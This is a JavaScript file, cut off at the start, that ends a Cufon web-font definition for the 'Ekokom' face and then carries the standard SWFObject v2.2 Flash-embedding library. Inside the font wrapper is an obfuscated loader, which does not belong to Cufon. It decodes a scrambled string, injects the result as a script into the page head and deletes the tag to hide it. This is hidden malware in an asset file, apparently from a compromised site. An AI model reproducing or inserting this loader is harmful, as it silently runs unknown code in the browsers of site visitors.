0,-52,24,-52,54v0,30,22,54,51,54"},{"d":"171,-109r92,0v5,-31,-7,-50,-38,-50v-30,0,-46,22,-54,50xm251,-58r42,0v-13,40,-48,63,-91,63v-31,0,-57,-9,-65,-37v-27,51,-140,53,-140,-13v0,-62,62,-64,119,-67v15,-1,24,-10,24,-24v0,-37,-76,-29,-80,6r-39,0v9,-46,44,-61,88,-61v24,0,45,5,59,27v42,-54,137,-22,137,48v0,11,-1,22,-4,34r-135,0v-7,28,4,55,38,55v24,0,41,-11,47,-31xm130,-92v-29,17,-92,-1,-92,41v0,17,15,24,33,24v44,0,52,-31,59,-65","w":320},{"d":"-2,0r38,-186r39,0v-1,9,-6,20,-4,27v22,-35,97,-51,110,1v31,-53,129,-41,113,39r-23,119r-41,0r26,-132v0,-13,-4,-27,-25,-27v-74,0,-56,99,-76,159r-41,0r26,-136v4,-32,-47,-25,-57,-8v-32,29,-30,96,-44,144r-41,0","w":320},{"d":"2,69r-35,0v83,-107,102,-196,68,-332r29,0v52,122,20,249,-62,332","w":106},{"w":100},{"d":"92,-220r-17,85r68,0v40,0,50,-27,50,-50v0,-14,-6,-35,-43,-35r-58,0xm1,0r54,-257r103,0v80,0,80,54,80,78v0,1,-1,80,-94,80r-77,0r-21,99r-45,0","w":240},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48","w":213},{"d":"-18,69r53,-255r41,0v-1,8,-6,18,-5,24v37,-55,129,-27,129,48v0,57,-31,119,-95,119v-28,1,-48,-10,-62,-34r-20,98r-41,0xm54,-75v0,27,12,48,41,48v44,0,64,-44,64,-83v0,-27,-13,-49,-41,-49v-44,0,-64,45,-64,84","w":219},{"d":"115,-54v0,-37,-98,-24,-98,-80v0,-41,39,-57,77,-57v40,0,73,13,72,59r-39,0v0,-19,-15,-27,-37,-27v-16,0,-32,6,-32,24v0,17,29,19,55,29v22,8,43,21,43,50v0,43,-41,61,-82,61v-43,0,-77,-14,-78,-65r39,0v-1,23,17,33,41,33v17,0,39,-6,39,-27xm46,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":180},{"d":"28,-134r11,-48r50,0r-11,48r-50,0xm0,0r11,-49r50,0r-11,49r-50,0","w":100},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm103,-253r40,0r-7,39r-40,0"},{"d":"22,32r0,-90r36,0r0,90r-36,0xm22,-148r0,-90r36,0r0,90r-36,0","w":79},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm151,-263r28,52r-30,0r-19,-32r-33,32r-33,0r49,-52r38,0","w":213},{"d":"203,49r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-25,33,-43,52,-53r-15,0r-11,-68r-102,0r-39,68r-49,0r154,-257r48,0r45,257r-7,0v-33,21,-47,35,-47,47v0,19,21,16,32,2xm164,-102r-17,-110r-62,110r79,0","w":246},{"d":"180,45r-180,0r0,-18r180,0r0,18","w":180},{"d":"22,-99r33,-158r45,0r-26,125r83,-51r-7,33r-83,51r-13,60r130,0r-8,39r-175,0r14,-67r-31,19r7,-32","w":206},{"d":"1,0r54,-257r45,0r-46,218r130,0r-8,39r-175,0","w":206},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm164,-310r47,0r-46,38r-33,0","w":246},{"d":"50,-81v-39,0,-32,-55,0,-54v14,0,27,12,27,26v0,14,-12,28,-27,28","w":100},{"d":"96,49r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-22,23,-38,42,-48v-43,-3,-73,-33,-73,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31r41,0v-11,36,-36,56,-70,61v-30,19,-41,32,-41,44v0,19,21,16,32,2xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50"},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm123,-205v-20,0,-37,-17,-37,-37v0,-20,17,-37,37,-37v20,0,37,17,37,37v0,20,-17,37,-37,37xm101,-242v0,12,10,22,22,22v12,0,22,-10,22,-22v0,-12,-10,-22,-22,-22v-12,0,-22,10,-22,22","w":206},{"d":"-9,-78r7,-39r361,0r-8,39r-360,0","w":360},{"d":"164,-72v0,-67,-132,-22,-132,-111v0,-46,35,-80,96,-80v54,0,97,22,95,82r-43,0v0,-32,-18,-45,-53,-45v-12,0,-50,3,-50,37v0,25,26,32,54,39v36,9,78,19,78,73v0,40,-29,83,-107,83v-60,0,-99,-27,-97,-91r43,0v-2,40,22,54,59,54v24,0,57,-11,57,-41xm73,48r8,-35r36,0v-8,30,-7,70,-48,72r3,-15v13,-2,19,-10,21,-22r-20,0","w":233},{"d":"115,-54v0,-37,-98,-24,-98,-80v0,-41,39,-57,77,-57v40,0,73,13,72,59r-39,0v0,-19,-15,-27,-37,-27v-16,0,-32,6,-32,24v0,17,29,19,55,29v22,8,43,21,43,50v0,43,-41,61,-82,61v-43,0,-77,-14,-78,-65r39,0v-1,23,17,33,41,33v17,0,39,-6,39,-27xm109,-263r45,0r-43,51r-30,0","w":180},{"d":"18,-154r7,-32r149,0r-7,30r-122,124r105,0r-7,32r-161,0r7,-30r123,-124r-94,0xm109,-263r45,0r-43,51r-30,0","w":173}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-1178-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("lK~NPC#?EzxFl3on.C>{$K$x=G#N~CxF=GJ{EztV~6SI+M?m(>&N7aAr~6&N7aAr7N&N7aAC+%xw.!B&7zJw.!B&7r#w.!Bc+z~w.!B&#z~w.!B&#K#w.!B&7M~w.!Bc~!.w.!B&#GJa=o&N7aAC76&N7aAU~o&N7akN76&N7akM76&N7akG7>&N7ak{+6&N7aAo7N&N7aAC+o&N7akG+6&N7akM73.w.!Bc+zJw.!B&#CJw.!Bc~K6w.!B&#atw.!Bc+G>w.!B&#!Aw.!B&7GkM=)%c7!Bq=)%c7K%c=)%c7K7N=)%c7Ktr=)%c7K$BA3ak>K)$JlQ7#Rf(t@!%6z=+~EPw.9DZymrUoCV_pj5IOF2c&{M?NGqH8gnSxsdM=)%c7KtU=)%c7!%q=)%c7K(c=)%c7K+M=)%c7KJC=)%c7KkNlo&N7akM~6&N7aAU7N&N7ak{~6&N7aAm7K~w.!B&7!Jw.!B&7a#w.!B&#M#w.!Bc~C6w.!Bc+!Jw.!B&7Ktw.!Bc~aow.!B&#rJw.!Bc~rJw.!B&7!~w.!Bc~!tw.!B&#!6w.!Bc+Mow.!Bc~C#w.!B&#z6w.!Bc~r6w.!Bc~!ow.!B&#G6x=)%c7K7q=)%c7!${=)%c7K#r=)%c7!w&$N&N7akNR6&N7akNR>&N7aAr7o&N7aAm+oNw.!B&#!~w.!Bc~r~w.!B&R!$?=)%c7K6y=)%c7!78=)%c7K7GJo&N7aACRao@=)%c7K${fr6w.!B&7K#w.!Bc+rUc=)%c7K>y=)%c7K%&=)%c7!wc=)%c7!(q$=yw.!B&#Ktw.!B&7G#w.!B&7!#w.!B&#a$d76&N7aAU+6&N7ak&~o&N7aAm~)&w.!Bc~!%_=)%c7K~U=)%c7K6U=)%c7K#m=)%c7!Bc=)%c7!(G@6&N7akqR>&N7ak?#6&N7akM+o&N7aAm~=+G=)%c7K#C=)%c7Kk&E?.$=)%c7!+&=)%c7!7q=)%c7KkcEo&N7aAC#N&N7ak&7K8w.!B&7C~w.!B&7K~w.!B&#r6w.!Bc~z~w=>&N7aAC7>>w.!B&#MJ!=)%c7K7?=)%c7!k&+?Ow.!Bc+C#qzN&N7aAo7ry~t>pw.!Bc+!ow.!B&7!yp=)%c7K(&wqtw.!Bc~z6w.!Bc~ayy=)%c7!.r=)%c7K7cDo&N7aAo+o&N7aAU#ztw.!B&#r#+9o&N7akqR6&N7aAoRk%x~6&N7akN7r$n=)%c7!+?Q>&N7aAC~Upw.!Bc~z#z=)%c7K$&=)%c7KkMJ>c2=3JV=)%{7a$G=)%c7!B&6N(F+o&N7akM~KAw.!B&#ayw.!Bc+C>A=)%c7Ktm#qJw.!B&7a6w.!Bc+Gtw.!Bc~at3Q6&N7aAy#N&N7rB&7N&N7akc#o&N7akc7o&N7aAyR>&N7ak{+VOw.!Bc~a.w.!Bc+r~w.!B&#!#w.!Bc+rtw.!B&#!tw.!B&7z>w.!Bc+MyK=)%c7K>o.@Ow.!Bc~ro#J6&N7rk{7o&N7akc~6&N7aAmR>&N7akG~zy&66&N7aAU7o&N7rB&R>&N7akq~>&N7aAy+N&N7aAU#r&I96&N7rB&~>&N7akN+%8w.!$c7!ow.!B&7z6w.!$c7z#w.!B&#a#w.!Bc+!tw.!Bc~!~Ol@A(PqAw.!B{7!Ug=)%c7!kq=)%c7KkG=)%c7K+?=)%c7!B?=N&N7ak?7%&w.!Bc+M>w.!Bc+r.w.!B&7!ow.!B&#C~w.!$c7!tw.!B{7!yw.!B&#zJw.!B&#GkmQV#cPKo?l3$ml@&pf!BIwaNmQVBIPaNcQC&oPC.?E3&Vfz$F~m8VP)ocE)7x9q?nEz+_+m82EM?2=mZdRV.q.NcFl!S_fM_FlNcFEz8MEzto+6cF+qpSQmOwQCpyEqt{Eztp.>cF+qpSEC>5.)Jp~Ko?=38r9V&pPV#p~K6y=38r9mUUQGUF.K6M.3yIPG#y.Ko2Pm8_Pq#?PC>O~@Up~Cx{laOpfKcnl{Oplz.P+NOp=6?xw>Op==?pl3UZ")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"Ekokom","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-48 -325 405 85","underline-thickness":"18","underline-position":"-36","slope":"-12","stemh":"32","stemv":"41","unicode-range":"U+0020-U+2122"}}));




/*	SWFObject v2.2 <http://code.google.com/p/swfobject/>
	is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+O.location.toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}();
